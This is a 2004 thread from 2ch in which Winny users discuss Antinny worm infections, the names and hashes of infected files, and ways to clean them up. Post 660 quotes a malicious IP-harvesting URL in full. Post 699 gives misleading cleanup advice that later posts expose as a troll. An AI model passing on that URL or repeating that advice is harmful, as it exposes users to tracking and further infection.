603 :[名無し]さん(bin+cue).rar:04/04/12 19:23 ID:TYINVTmv
>599
ほかにも、実行可能な拡張子は山とあるが…

.regってのもオススメかもな(w

604 :[名無し]さん(bin+cue).rar:04/04/12 19:29 ID:1LCaxHzt
ISOもな

605 :[名無し]さん(bin+cue).rar:04/04/12 19:30 ID:FC2Ta5cs
オートランを切っていないなら、CDイメージは全部注意。

606 :[名無し]さん(bin+cue).rar:04/04/12 19:39 ID:NShyvmPT
ZIPの中にtxt.exeがあり、その横のフォルダーを誤って開いてしまいました
調べてみるとtxt.exeを実行する?様なことが書いてました
今のところ、winnyフォルダの中に
[null]noderef.txt [null]bbsnoderef.txtというファイルが作られており
中にノードがありました
一度消してからは二度と作られてません
変なプログラムも走ってないみたいです
これって既出のウイルスですか?

607 :[名無し]さん(bin+cue).rar:04/04/12 19:43 ID:FC2Ta5cs
>606
もうダメだな…手遅れ…

608 :[名無し]さん(bin+cue).rar:04/04/12 19:58 ID:26gm4sft
>>606
あ〜あ……








(・∀・)コンニチハ!!

609 :[名無し]さん(bin+cue).rar:04/04/12 20:07 ID:VyoDXvWn
>>606
まだまだ間に合う。

610 :[名無し]さん(bin+cue).rar:04/04/12 20:34 ID:DAnK6UWW
キンタマ玉玉玉玉玉...スレって終了したんですか?

611 :[名無し]さん(bin+cue).rar:04/04/12 20:46 ID:6YG27kFH
キンタマ玉×10+一[Part51].jpg   .exe
http://tmp2.2ch.net/test/read.cgi/download/1081563763/l50


612 :[名無し]さん(bin+cue).rar:04/04/12 20:59 ID:DAnK6UWW
>>611
サンクス

613 :[名無し]さん(bin+cue).rar:04/04/12 21:49 ID:DoKSjYtp
>>567
(T-T)人(T-T)ナカーマで、大丈夫なのか・・・俺!?

614 :[名無し]さん(bin+cue).rar:04/04/12 22:23 ID:Cl/jCsaN
Bit Defenderをインストールしたいんですが、日本語パッチのHPがみつからないんで、
誰か説明よろしく。

615 :[名無し]さん(bin+cue).rar:04/04/12 22:46 ID:E1FOpDXi
なんかキャッシュフォルダのキャッシュ20G程が突然消えてしまったのですが、
これってウィルスですか?

616 :[名無し]さん(bin+cue).rar:04/04/12 22:54 ID:QeNqIwxJ
>>615
ゴメン俺が消した

617 :[名無し]さん(bin+cue).rar:04/04/12 22:59 ID:T+U3co5Q
>>615
キャッシュ消えるくらいならましでしょ
もうパソコン捨てたい気分。。
・・・

ノートンがトロイを検出しますた
C:\WINDOWS\system32\msxml332.exe
Trojan Horse
適用した処理:ファイルを修復できません。


あ。これは、違うパソコンからで、
ウイルスパソは、LAN切ってます。。。。。。。。ぅぅ

618 :617:04/04/12 22:59 ID:T+U3co5Q
助けてください

619 :[名無し]さん(bin+cue).rar:04/04/12 23:16 ID:cHcKsKDL
>617
ノートン先生は、何って言ってるのよ。
トロイの木馬って言うだけじゃ、何がなんだかわからん。
もしかして、Trojan Horseが、ワームの識別名だと思ってる?

620 :[名無し]さん(bin+cue).rar:04/04/12 23:18 ID:Shzmh55n
nyで感染したのなら同情の余地はない w
再インストールでもすれば?

621 :617:04/04/12 23:21 ID:T+U3co5Q
msxml332.exe
msconfr.exe
value.bat

この3個が のーとん先生でも修復できないだと

622 :[名無し]さん(bin+cue).rar:04/04/12 23:24 ID:EW3lcZTs
キンタマってAntinnyのこと?

623 :[名無し]さん(bin+cue).rar:04/04/12 23:26 ID:T+U3co5Q
ふぅ
西院須古するか

624 :[名無し]さん(bin+cue).rar:04/04/12 23:27 ID:cHcKsKDL
>>617
わかった、もうわかった。
フォーマットしてOS再インストールしろ!
言ってる意味がわからないなら、それしか無いだろ。
窓から投げ捨てろ

625 :[名無し]さん(bin+cue).rar:04/04/12 23:33 ID:Shzmh55n
>>624
おまい(・∀・)イイ香具師だな。
まだ聞く気があるみたいだぞ。

626 :[名無し]さん(bin+cue).rar:04/04/12 23:37 ID:EW3lcZTs
Antinny.kに感染したら逮捕されちゃうのかなぁ?

627 :[名無し]さん(bin+cue).rar:04/04/12 23:47 ID:3VuUUew9
>>621
それAntinny.msだと思うよ。
このスレ検索してみ

628 :621:04/04/12 23:49 ID:T+U3co5Q
LANから外して、バックアップとって、
とりあえず放置して様子みてみるテスト

629 :[名無し]さん(bin+cue).rar:04/04/12 23:49 ID:Q5s4XBsQ
最近OS再インスコして、winnyを再ダウンして起動。
そしたらUPフォルダ1個、UPファイル0個になってるんですが、これってウイルスのせいですかね?


630 :621:04/04/12 23:51 ID:T+U3co5Q
NYやめようw

631 :621:04/04/12 23:51 ID:T+U3co5Q
いいかげんやめようよw


632 :[名無し]さん(bin+cue).rar:04/04/12 23:52 ID:OAkZcOOE
                       ,
                      ,/ヽ
                     ,/   ヽ
     >>629   ∧_∧  ,/      ヽ
           ( ´∀`),/          ヽ
           (  つつ@            ヽ
        __  | | |                ヽ
      |――| (__)_)                ヽ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|                ヽ
/⌒\/⌒\/⌒\/⌒\|彡~゚ ゜~ ~。゜ ~ ~ ~ ~~ ~ ~~ ~ ~~ ~~ ~~
⌒\/⌒\/⌒\/⌒\/⌒\彡 〜 〜〜 〜〜 〜〜 〜 〜

633 :[名無し]さん(bin+cue).rar:04/04/12 23:52 ID:lwKAx1OI
>>629
コンニチハ

634 :[名無し]さん(bin+cue).rar:04/04/12 23:53 ID:VwiT+4GD
>>506-508 ID:BOy+fo4+

軍曹!
あなたの「カスども」の口調にホレますた!!
ぜひカスの私に続きを!ご教授を!!w

ケツなめですか?某神がチャットでやってたヤシでいいでつね?では!

   ペ ロ 〜 ン   (by Nao)

635 :629:04/04/12 23:57 ID:Q5s4XBsQ
金玉?マジで?

636 :621:04/04/13 00:01 ID:Rpe7NRfB
仲間♪












じゃねーYO!てめー

637 :621:04/04/13 00:03 ID:Rpe7NRfB
よし、これからは
nyなどやらずに
清い体のままいこう♪

638 :[名無し]さん(bin+cue).rar:04/04/13 00:04 ID:23jtIjCo
>>629ってanttinyなの?

639 :[名無し]さん(bin+cue).rar:04/04/13 00:09 ID:7AMVjEbc
ノートン大先生がおっしゃる意味もわからんのならnyなどやらぬほうが良かろうよ。
軽装無知で雪山のぼってるようなものってこれも意味わからんか。

640 :[名無し]さん(bin+cue).rar:04/04/13 00:10 ID:XMGlQ2hT
(・∀・)

641 :[名無し]さん(bin+cue).rar:04/04/13 00:12 ID:23jtIjCo
>>639
そうだよな。
ところで>>629の症状が同じく漏れのPCにも出てるのですが、これはウイルスのコンニチハなのでしょうか?
ノートン先生やオンラインスキャンでは引っかからなかったのですが・・・。

642 :[名無し]さん(bin+cue).rar:04/04/13 00:13 ID:XMGlQ2hT
(・∀・)コンニチハ!

643 :[名無し]さん(bin+cue).rar:04/04/13 00:13 ID:HBJMlPCm
Antinny.msって結構ヤヴァイかもよ?
感染したけど勝手にny起動したりとかしたし・・・
あーOSは再インスコしたけど

644 :[名無し]さん(bin+cue).rar:04/04/13 00:17 ID:23jtIjCo
OS再インスコしたけど、これじゃあ再インスコしても無駄だな。
HDD内にバックアップがあるタイプだからな。
CDにしても無理なのかな?

645 :[名無し]さん(bin+cue).rar:04/04/13 00:18 ID:zOjqxDP+
あやしいexeをバイナリエディタで見てみようと思うんだけど
もしそのexeがキンタマだった場合バイナリエディタで開いただけで感染しちゃうもんなの?

646 :[名無し]さん(bin+cue).rar:04/04/13 00:18 ID:OfdnG0II
Antinny.msは137ポート使って外部とアクセスしようとするね。


647 :[名無し]さん(bin+cue).rar:04/04/13 00:23 ID:/QUHsjph
>>528
これに感染した際の実害って
>アンチウイルスソフト(ノートン、バスター)の自動実行を無効に。
>子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可
の二つだけなの?他に何かやってるの?

648 :[名無し]さん(bin+cue).rar:04/04/13 00:28 ID:OfdnG0II
>>647
しばらく飼ってみようかと思ってたんだけど、PCを別のことに使うことになっちゃったから
646程度しかわからない。

649 :[名無し]さん(bin+cue).rar:04/04/13 00:31 ID:HBJMlPCm
>>647
ワカンネ

650 :[名無し]さん(bin+cue).rar:04/04/13 00:45 ID:K1/McdIK
おまいらあんまり簡単にやられすぎですよ。
Happy Tree Friendsに出てくるかわいい動物たちみたいなもんですね。
何だそれ?って人は↓に逝ってね。おまいらがいっぱい登場するから。
ttp://acthtf.hp.infoseek.co.jp/

651 :[名無し]さん(bin+cue).rar:04/04/13 00:51 ID:l0k6oI7n
ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi
これ何?

652 :[名無し]さん(bin+cue).rar:04/04/13 01:02 ID:aHbeJ8cu
駆除の方法でレジストリの怪しい値を削除ってあるんですが
具体的にはどんなあたいなんですか?

653 :[名無し]さん(bin+cue).rar:04/04/13 01:03 ID:aHbeJ8cu
駆除の方法でレジストリの怪しい値を削除ってあるんですが
具体的にはどんなあたいなんですか?

654 :[名無し]さん(bin+cue).rar:04/04/13 01:04 ID:99ZsIcQe
>>653
  ┏┳┳┓              ┏┳┳┓
┏┫┃┃┃ 厨房・無知は. ┃┃┃┣┓
┃┃┃┃┣┓ ここまで   ┏┫┃┃┃┃
┃      ┃┃┏━━━┓┃┃      ┃
┃ 調べる. ┣┫ ・∀・ ┣┫  努力を┃
┗━━━━┛┗┳━┳┛┗━━━━┛
            ┏┻┓┃
        ┏━┛  ┣┻┓
        ┗━━━┫  ┗━┓
                ┗━━━┛

655 :[名無し]さん(bin+cue).rar:04/04/13 01:05 ID:mgyWRGfv
>>651
serpent.cgi_mode=ipget&port=24564に繋いでIP抜こうとするっぽい。
Irvineで落としたら『IPが抜けませんでしたっ』という文字列を確認。

656 :[名無し]さん(bin+cue).rar:04/04/13 01:12 ID:l0k6oI7n
>>655
サンクス 安易にクリックしてしまって、すぐに回線抜いたんだが
WMPやRPやなどを勝手に起動したりして不安になってたんだけど安心した


657 :[名無し]さん(bin+cue).rar:04/04/13 01:16 ID:YqIfyyPJ
俺、スゴ腕ハッカーですけど、普通にウィルス作って流したら逮捕されるけど
nyでなら出所不明だし、違法ファイルにオマケしたなら落とした人も犯罪だし、カモもたくさんいるし、いろんな種類のウィルスつくって遊べるし、2ちゃんに行けば被害者が出たら腹かかえて笑えるし
万一外に流出して一般人に被害が出ても、ウィルスの出所なんて突き止めようがないし〜、nyユーザー全員に罪をなすりつける事も出来そうだし
アングラってとても怖いですね

658 :[名無し]さん(bin+cue).rar:04/04/13 01:18 ID:0xo5Pzp4
                       ,
                      ,/ヽ
                     ,/   ヽ
     >>999   ∧_∧  ,/      ヽ
           ( ´∀`),/          ヽ
           (  つつ@            ヽ
        __  | | |                ヽ
      |――| (__)_)                ヽ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|                ヽ
/⌒\/⌒\/⌒\/⌒\|彡~゚ ゜~ ~。゜ ~ ~ ~ ~~ ~ ~ぬるぽ~ ~ ~~ ~~ ~~
⌒\/⌒\/⌒\/⌒\/⌒\彡 〜 〜〜 〜〜 〜〜 〜 〜

659 :[名無し]さん(bin+cue).rar:04/04/13 01:19 ID:l0k6oI7n
>>658
ガッ

660 :[名無し]さん(bin+cue).rar:04/04/13 01:20 ID:mgyWRGfv
>>656
http://
↑+www.hellplant.org/cgi-bin/xoor/serpent.cgi?mode=ipget&port=24564

ftp://
gopher://
https://
pnm://
mms://
rlogin://
tn3270://
telnet://
news://
↑+www.hellplant.org:24564/

よく分からんが大量に開くなw
一番上がIP抜く。
他は知らん。

661 :[名無し]さん(bin+cue).rar:04/04/13 01:24 ID:1kTCE8en
>>660
固定IPだとやヴぁいの?

662 :[名無し]さん(bin+cue).rar:04/04/13 01:38 ID:mgyWRGfv
www.hellplant.org/
ここ自体に繋いでみたけどBBSとかあるだけで普通そうだった。
BBSの中はうわなんだおまえやめr

663 :[名無し]さん(bin+cue).rar:04/04/13 01:43 ID:l0k6oI7n
やめr で誰かが最後に書き込みボタンを押した件について

664 :[名無し]さん(bin+cue).rar:04/04/13 02:04 ID:japK5D89
>>663 襲う中の人も色々と大変なんだろ

665 :[名無し]さん(bin+cue).rar:04/04/13 02:04 ID:WI27Y8AF
[アルバム] (2004.03.31) 大塚愛 - Love Punch (通常盤/192Kbps).zip 67,232,778 d9da3f2d0c88bd63bcd4ddaa1489f5f3
Antinny.msを確認。アイコンはWMPのものでした

666 :[名無し]さん(bin+cue).rar:04/04/13 02:15 ID:Bb+E7d9B
>>647
前スレあたりにACCSのアドレスがリソースに含まれているという報告あったよね。
そこが肝心な部分じゃあないのかな。実際にそれを確認した人がまだいないだけで
その二つだけってことはないだろう。

667 :[名無し]さん(bin+cue).rar:04/04/13 02:46 ID:CMFEyXlO
666 で ダミヤン

668 :[名無し]さん(bin+cue).rar:04/04/13 02:48 ID:ig3gkurZ
釘師ダミやん

669 :[名無し]さん(bin+cue).rar:04/04/13 07:07 ID:h0mwt4vi
【シリアル集】Pandora - 2004年04月08日版.lzh 2,567,425 64e4b31fa6453ce893af0b6c8110c3a3

00.txt                         .exe

って感じのファイルが10個ぐらい入ってる
実行するとどうなるのかはワカンネ

670 :[名無し]さん(bin+cue).rar:04/04/13 07:58 ID:uHldNmeJ
感染した場合
ファイル検索のところでUPフォルダ内もチェック入れて、「デスクトップ 自分のユーザー名」辺りで検索するとヒットするんでしょうか?

671 :[名無し]さん(bin+cue).rar:04/04/13 08:20 ID:54fq/RG+
>>670
すでにキャッシュ化されているとわからない。

exe踏んだ経験があるなら、何されててもわからん、バックドア仕掛けられて
それを検地できるスキルがあるのか? 怪しいと思ったら、OS再インスコ。

672 :[名無し]さん(bin+cue).rar:04/04/13 08:45 ID:APUN12ct
● ● ● ● ● ● ● ● ● ● ● ● ● ● ●
新種・亜種ウイルスを発見した場合のサンプル提出方法

ノートン
http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
ウイルスバスター
http://inet.trendmicro.co.jp/esolution/supform.asp
マカフィー
http://www.nai.com/japan/security/contactavert.asp
ウイルスセキュリティ
https://www.sourcenext.com/qa/action/qagoodslist
NOD32アンチウイルス
http://canon-sol.jp/supp/n_email.html
ウイルスドクター
http://www.virusdoctor.jp/virus/
ウイルスプロテクター
http://www.lifeboat.jp/support/support.html
ウイルスチェイサー
http://www.viruschaser.jp/support_vc.html

BitDefender
http://www.bitdefender.com/bd/site/contactus.php
AntiVir
http://www.free-av.com/ からContactをクリック
avast!
http://www.avast.com/i_idt_144.html
eTrust
http://www.caj.co.jp/support/csp/free_policy/virus.htm
AVG
http://www.grisoft.com/faq/us_faqindex.php?id_rodice=2

● ● ● ● ● ● ● ● ● ● ● ● ● ● ●

673 :あぽ〜ん:04/04/13 09:16 ID:zIh31k3P
放課後 濡れた制服 あたりで、ソフトメーカー自らがフォーマットウィルスを仕込んだイメージを放流した……らしい情報を、得たのですが……
 ノーCDパッチをいれたら、ずっとそのソフトが起動し続けるとかしないとか……正規品の手抜き起動が目的な人達は、どう対処すればOK?

674 :[名無し]さん(bin+cue).rar:04/04/13 09:19 ID:Yn4KaQjm
>>673
ソース。場合によっては刑事沙汰。

675 :[名無し]さん(bin+cue).rar:04/04/13 09:33 ID:7D6O/mLF
>>528に感染しました。
んで、ノートン先生でスキャンしたら、修復できないから検疫するねって
メッセージが出て、それをノートン先生に提出してちょーだいって言われて
ます。
この場合、自分の名前やらアドレスやらが記入の必須項目になってるん
ですけど、ヤバイ?
後ろめたいファイルだから、提出するのためらっちゃうよ…。

676 :あぽ〜ん:04/04/13 09:38 ID:zIh31k3P
>>675
 身体はってウィルスと戦ったんだから、提出すれば?
 本物なら、相手だって利益あるっしょ。世界一のウィルス対策ソフトだっていえるし。
 後ろめたい? なら、適当な名前いれちゃぇ〜。(笑

677 :[名無し]さん(bin+cue).rar:04/04/13 09:39 ID:MuHVmPwj
できれば提出してほしいな偽名でもいいから

678 :[名無し]さん(bin+cue).rar:04/04/13 09:55 ID:7D6O/mLF
>>676
>>677

あー、偽名ってテがありましたか。
んじゃ捨てアドで今から提出してみたいと思います。
つーか、ソフトの登録した時に本名入れてるから、シリアルとか
そういうのからバレバレな気がするけど。
そこまでの情報は向こうに送らないのかな?

679 :[名無し]さん(bin+cue).rar:04/04/13 10:43 ID:ekUcZGcB
>>674
インスコまでは普通に行われるがゲームを起動させるとフォーマットだったかな。

680 :[名無し]さん(bin+cue).rar:04/04/13 11:48 ID:vXeQx9fN
BISHOP?


681 ::[名無し]さん(bin+cue).rar :04/04/13 12:51 ID:NvB3BYK3
>>674
一回やってみる価値はあるよ。
結構良い経験になるかもw

682 :[名無し]さん(bin+cue).rar:04/04/13 13:11 ID:54fq/RG+
>678
シマンテックへの提出には、氏名=もちろん偽名、メールアドレス=
「適当な文字列@適当な文字列.適当な.com」あたりでも届くと思われ

手間じゃなければ、やっとけ。がしかし、修復できない時点で、ヒット
しているので、すでにその亜種?は識別されている。未識別の怪しい
exeを送ったほうがマシかも。

識別→検疫(拡張子を変えて、圧縮保存)→削除。
修復できないものの大半は、それ自体がワームの実行ファイルだから。
何かのファイルにくっつく(埋め込まれる)ものは、修復できる

683 :572:04/04/13 13:28 ID:XbqitYE9
>>665
それだ(TT)

684 :[名無し]さん(bin+cue).rar:04/04/13 13:36 ID:7D6O/mLF
>>682
もう送っちゃいました、すいません〜。
怪しいexeファイルを送ったほうがやっぱりよかったですかね。
でも、送ってすぐに捨てアドのほうにノートン先生からメールが返ってきて、
最新版のウィルス定義で再度スキャンしてくれと言われました。
もしかして対応したのかな、antinny.ms。

>>683
自分は宇多田だったYO!
アタマきたから削除したけどね。もう二度とごめんだ。

685 :[名無し]さん(bin+cue).rar:04/04/13 13:49 ID:G/gm9mcu
>>683
折れはそれの320kbpsの方でやられました
つД`)・゚・。・゚゚・*:.。..。.:*・゚

686 :[名無し]さん(bin+cue).rar:04/04/13 14:05 ID:54fq/RG+
古いウイルスなんだが、地引でかかった晒し挙げの詰め合わせの中に
感染してたのを分離したよ。これは、あれだチェルノブイリだな

症状:HDDフォーマットとかBIOS感染とか
tp://www.symantec.com/region/jp/sarcj/data/w/w95.cih.html


687 :[名無し]さん(bin+cue).rar:04/04/13 14:32 ID:jtHMQBxY
>>685
実行ファイルは、何だったの?


688 :[名無し]さん(bin+cue).rar:04/04/13 14:36 ID:G/gm9mcu
>>687
.folder.exe Antinny.ms
中身がピンクレディーだったのでこの中にあるのかと・・・_| ̄|○

689 :[名無し]さん(bin+cue).rar:04/04/13 16:23 ID:ykq2987y
>>673
そりゃ>>15じゃねぇの?
あんま不確定な事書くなや

690 :[名無し]さん(bin+cue).rar:04/04/13 18:01 ID:3tpgig2i
なんか新しいバージョン出てきてるんだけど…
ウィルスですか?

691 :[名無し]さん(bin+cue).rar:04/04/13 18:10 ID:54fq/RG+
クラック版だろ、気にするなyo

692 :[名無し]さん(bin+cue).rar:04/04/13 18:23 ID:/7mwBAmv
WinnyフォルダのUPフォルダ内に黄色いアイコンの
怪しいexeファイルが様々なファイル名で増殖してます。
どれも決まって636kbのサイズです。
毎回削除してもny起動後、出現します。
これは何かのウィルスに感染したのでしょうか?


693 :[名無し]さん(bin+cue).rar:04/04/13 18:33 ID:u2WMvycW
>>665
漏れはこれを起動したらノートンからスクリプト警告が出た。
あせったので急いで遮断して閉じたんだが感染してんのかな?
いちおう症状見てても今の所何も無いから大丈夫なんかねえ

694 :[名無し]さん(bin+cue).rar:04/04/13 18:38 ID:AfLqLuDD
キンタマって繋いだだけで(・∀・)コンニチワって事ですか?

踏まなきゃセーフなんですか?無知ですみません。

695 :[名無し]さん(bin+cue).rar:04/04/13 19:26 ID:54fq/RG+
>>692-694
まとめて
(・∀・)コンニチハ!!

696 :[名無し]さん(bin+cue).rar:04/04/13 19:39 ID:StL3UqDZ
キンタマ2次感染なんかは基地外としか言いようが無い。

697 :[名無し]さん(bin+cue).rar:04/04/13 20:27 ID:ctpqkYVV
>>694
キンタマに繋ぐのってどうするんですか?
踏むってのも意味わかっていってるんですか?
そもそもNY始めたばかりですね?
コンニチワ祭りにも参加してませんね?
NHKを見て始めた方ですね?
ネトランですか?47氏の読み方から始めますか?
システム情報の詳細には解らない単語満載ですね?
全く無知ですね。
ムチはSMですよ。 
結論として貴方は 変態紳士ですね。

698 :[名無し]さん(bin+cue).rar:04/04/13 20:55 ID:K1/McdIK
>>697
ムチャクチャな論理にワロタ

699 :[名無し]さん(bin+cue).rar:04/04/13 20:59 ID:QBXhhjV8
>>694
なんで皆、初心者に厳しいんだろう・・・。
簡単な事なんだし普通に教えてあげればいいじゃない。

1:キンタマは圧縮ファイルを開いてからでないとウィルス検知できても検疫できません。
だから基本的に圧縮ファイルはすべて開いてから中身を一つづつスキャンして検疫します。

それを知らない人が圧縮ファイルの状態でスキャンして検疫して
結果的にキンタマの増殖や自動感染を及ぼしてしまうのです。

2:しかし亜種もあるので、そういった方法をとっても感染してしまう事があります。
そこで、すぐにnyを起動してワクチンのキンタマを拾います。

感染したとおぼしきファイルと似たものを手に入れましょう。
それを解析して、どのレジストリが書き換えられたか等を割り出し対処します。

3:解析は初心者には難しいので
具体的にどういったファイルを落として、どういう手順で感染したのか
もう一度このスレにきて報告しましょう。

たいがい、似たタイプの感染をしているので
解析方法や対処の仕方を教えてくれます。

700 :[名無し]さん(bin+cue).rar:04/04/13 21:15 ID:Ml5eptWx
>>699
おまい親切すぎΣΣ(゚Д゚;)

701 :[名無し]さん(bin+cue).rar:04/04/13 21:32 ID:blnImUD+
>>699
m9 ( ´,_ゝ`) 通報しますた

702 :[名無し]さん(bin+cue).rar:04/04/13 21:45 ID:WOw2VAjq
>>699
>なんで皆、初心者に厳しいんだろう・・・。
>簡単な事なんだし普通に教えてあげればいいじゃない。

-----中略--------

>3:解析は初心者には難しいので
>具体的にどういったファイルを落として、どういう手順で感染したのか
>もう一度このスレにきて報告しましょう。

>たいがい、似たタイプの感染をしているので
>解析方法や対処の仕方を教えてくれます。

オイオイ、書き出し部分と最後の部分で矛盾が生じているぞ。
釣りならうまくやれよ


703 :[名無し]さん(bin+cue).rar:04/04/13 21:48 ID:g7vkCdYk
>>699
P2P=UGみたいなもんに最近なってきてるんだから、厳しいのは当然だろ?
自己責任なんだから、結局最後は自分で対処せなあかんのだから・・・。

704 :[名無し]さん(bin+cue).rar:04/04/13 22:06 ID:pouJLgth
>>699
ここで優しく教えてあげれば味を占めて、またわからないことがあった時に聞きに来るかもしれない。
その時もおまいさんが優しく教えてくれるのか? いつでも教えてあげられるか?

「質問すれば何でも教えて貰える」と考えるようになってしまってはダメなんだ。
ただ質問になんでも答えているだけじゃ、双方に不利益なだけなんだよ。
世間では普通そう言う時は対価をとって丸く収める。それが社会の決まり事。
こちらは善意で教えてあげても、教えられた方が無料サポセンのつもりじゃ意味がない。
罵詈雑言の果てに自力かヒントかで答えにたどり着いてこそ、経験値になるんだ。
「自分で調べてわからなければ質問する」くらいになってもらわなければダメなんだ。


ただ、>>699のような人間は貴重でもある。
君のような人間が居るからこそ、罵倒の果てに答えにたどり着けるわけだしな。
次からは是非最初の2行をぐっとこらえて、答えだけでどうぞ。
それこそが“マジレスマン”の心意気というものだ。
煽らせず、煽られても反応せず、ただ黙々と質問に答えていくというのも、悪くない。

705 :[名無し]さん(bin+cue).rar:04/04/13 22:09 ID:zpQNrAt5
>>699
ご丁寧に教えて頂きありがとうございます。
実は騒ぎがあってからはずっとny起動してないんです。

初心者は下手な事しない方が良いって分かりました。






706 :[名無し]さん(bin+cue).rar:04/04/13 22:10 ID:T6rd1+wu
ファイル詰め合わせに既婚限定出会い系チャットで1:1で複数の女とのチャットログを女々しく保存してる女々しい奴があった。


707 :[名無し]さん(bin+cue).rar:04/04/13 22:22 ID:54fq/RG+
>>704
たとえばこんな風に…

>705へ、>699は釣りだよ。
699の言うようにやったら、素人はミスして感染するばっかりだと思われ(w
つーか、キンタマのワクチンって..なによ。

708 :[名無し]さん(bin+cue).rar:04/04/13 22:25 ID:K1/McdIK
感染報告するならまず感染源が含まれてたファイルのファイル名とハッシュを晒してくれ。


709 :[名無し]さん(bin+cue).rar:04/04/13 22:29 ID:gLjplwF7
とりあえず圧縮ファイルやEXEを開かなければOKですか?
ドウガモヤヴァイ?

710 :[名無し]さん(bin+cue).rar:04/04/13 22:29 ID:IJ0ljbok
EXE実行以外で感染する奴ってあったっけ?

711 :[名無し]さん(bin+cue).rar:04/04/13 22:31 ID:IJ0ljbok
>>74の奴はアイコン自分で色々変えるっぽいな

712 : :04/04/13 22:52 ID:VeEEgpXy
ふと思い出したんで探したらまだこれ残ってるね
             ↓
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A&VSect=T

713 :[名無し]さん(bin+cue).rar:04/04/13 23:09 ID:q714sUuT
ZIPを開くとフォルダ名が(1−−−)
みたいな感じになるのですが、これは他に害はありますか?また駆除方法を教えてください。もうだいぶ放置してます

714 :[名無し]さん(bin+cue).rar:04/04/13 23:28 ID:Vy0PLZLA
(・∀・)コンニチハ!!

715 :[名無し]さん(bin+cue).rar:04/04/13 23:34 ID:jX6O8UjC
先日、もせtitle exeを踏んでしまったんですが
それ以来PC立ち上げてny起動するたびにデスクトップ上に
Up Folder.txtが出来ます。内容はBBS [Pass]=
です。  で、いったんtxtを削除し、nyを終了して
再び立ち上げるとtxtは出来ません。しかしPC再起動してnyを立ち上げると
やっぱりUp folder.txtが出来ます。それ以外は今のところ不具合はありません。
今流行のキンタマなんでしょうか。


716 :[名無し]さん(bin+cue).rar:04/04/13 23:39 ID:uFp7qMX5
>>707
最近 [キンタマ] 俺のデスクトップ キンタマ診断.exeとか
[キンタマ] 俺のデスクトップ キンタマワクチン.exe とか流れてる
ったく悪質な。>>699も教えるんなら「とことん最後まで」汁!!悪党めw

【一例】
[キンタマ] 俺のデスクトップ ウィルス駆除ツール eNYtypeCHELL.exe
5fec6027a354c9a24dc047e13aa70258
49,115

# NODが今日もまたAntinny用のモジュール更新した。何気に健闘してるんでオドロキ

717 :[名無し]さん(bin+cue).rar:04/04/13 23:39 ID:sh6FTT9H
>715
.ms(・∀・)コンニチハ!!


718 :[名無し]さん(bin+cue).rar:04/04/13 23:47 ID:jX6O8UjC
>717
しかしWindowsフォルダにsvchost.exeとSystemフォルダにms???.exe(248k)ms???.exe(282k)
が見当たらないんですけど・・

719 :[名無し]さん(bin+cue).rar:04/04/13 23:50 ID:jX6O8UjC
>717
しかし、Windowsフォルダにsvchost.exeとms???.exe(248k)ms???.exe(282k)
が見当たらないんですけど・・


720 :[名無し]さん(bin+cue).rar:04/04/13 23:52 ID:jX6O8UjC
二重書きすいません。

721 :[名無し]さん(bin+cue).rar:04/04/13 23:57 ID:FKBm2Qgg
まぁ待て、
>>463の書き込みと>>715の書き込みの内容が同じだ。
釣りか…

722 :[名無し]さん(bin+cue).rar:04/04/14 00:00 ID:NPdQ8dAh
シマンテックのオンラインスキャンにできるか確認してみ
俺の場合オンラインスキャンできなかった
そのとき俺がとった行動はCドライブフォーマットだ。

723 :[名無し]さん(bin+cue).rar:04/04/14 00:19 ID:+oCiv4+R
>・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限
このやりかたがわからない。

724 :[名無し]さん(bin+cue).rar:04/04/14 00:34 ID:jydT0sG7
Antinnyにやられました。

お仕事用のノートPCなんで、ウィルスバスターのアラームが不定期にあがってきます。

隔離して、削除してもしばらくしたらまた出てきます。
トロイの木馬型ってことなのですが、マジで気味悪いです(T_T)

725 :[名無し]さん(bin+cue).rar:04/04/14 00:37 ID:0UJ4xSRL
>>723
  ┏┳┳┓              ┏┳┳┓
┏┫┃┃┃ 厨房・無知は. ┃┃┃┣┓
┃┃┃┃┣┓ ここまで   ┏┫┃┃┃┃
┃      ┃┃┏━━━┓┃┃いろいろ┃
┃ 初心者 ┣┫ ・∀・ ┣┫ ためせ ┃
┗━━━━┛┗┳━┳┛┗━━━━┛
            ┏┻┓┃
        ┏━┛  ┣┻┓
        ┗━━━┫  ┗━┓
                ┗━━━┛
普通にレジストリ上のフォルダアイコン上で右クリック→アクセス許可で設定すればいいんじゃないのか?
俺はアクセス制限できるってことは知らなかったけどやることができるってわかればどうやってやれば大体見当が付くが? メニュー欄探すなり右クリックするぐらいだけど
書き込む前に右クリックくらいしろと
こんな香具師ばかりだからみんなマジレスしないんだよ

書き込む前にいろいろためせ
そんなだといつまでたっても初心者だろ

726 :[名無し]さん(bin+cue).rar:04/04/14 00:39 ID:6+RPinSV
>>724
仕事用PCでnyをやるお前が悪い

727 :[名無し]さん(bin+cue).rar:04/04/14 00:41 ID:/j/ZY+xy
>721さん
釣りではございません。463のときは誰も相手にされなかったので・・
失礼と思ったのですが同じものをカキコさせていただきました。
>722さん
やはりオンラインスキャンもWINDOWSupdateも接続できませんでした。
CドライブフォーマットをするとOSも消えるんですか?
私のPCはメーカー製品ものなのでOSソフトが無いのですが・・
リカバリーでもOKですか?
質問ばかりですいません。

728 :[名無し]さん(bin+cue).rar:04/04/14 00:47 ID:6+RPinSV
>>727
とりあえずHDDの中身を全て消せ。

729 :[名無し]さん(bin+cue).rar:04/04/14 00:48 ID:K/7eNIE8
>>725
自分の事だけ考えて生きるのもそれはそれで、その人の人生だから何も言わん。
しかしわざわざ経験のない初心者を門前払いしようという姿勢はどうかな?
そんなら情報交換の場である2chの意味なんかないんじゃないのかな?

俺自身、2chで色々情報交換しながら知識を吸収していった人間だからなおさら
そういう姿勢が気に食わん。少なくとも自分が知っていることは簡単でもいいから
かならず回答するようにしてるがね。

730 :[名無し]さん(bin+cue).rar:04/04/14 00:55 ID:vu/1Tiij
>>729
そんなん既出&メーカーのマニュアルと過去ログ嫁。ってカンジでしょ
初心者云々以前の問題。

・・・で、答えてないんだけど?簡単にでもw

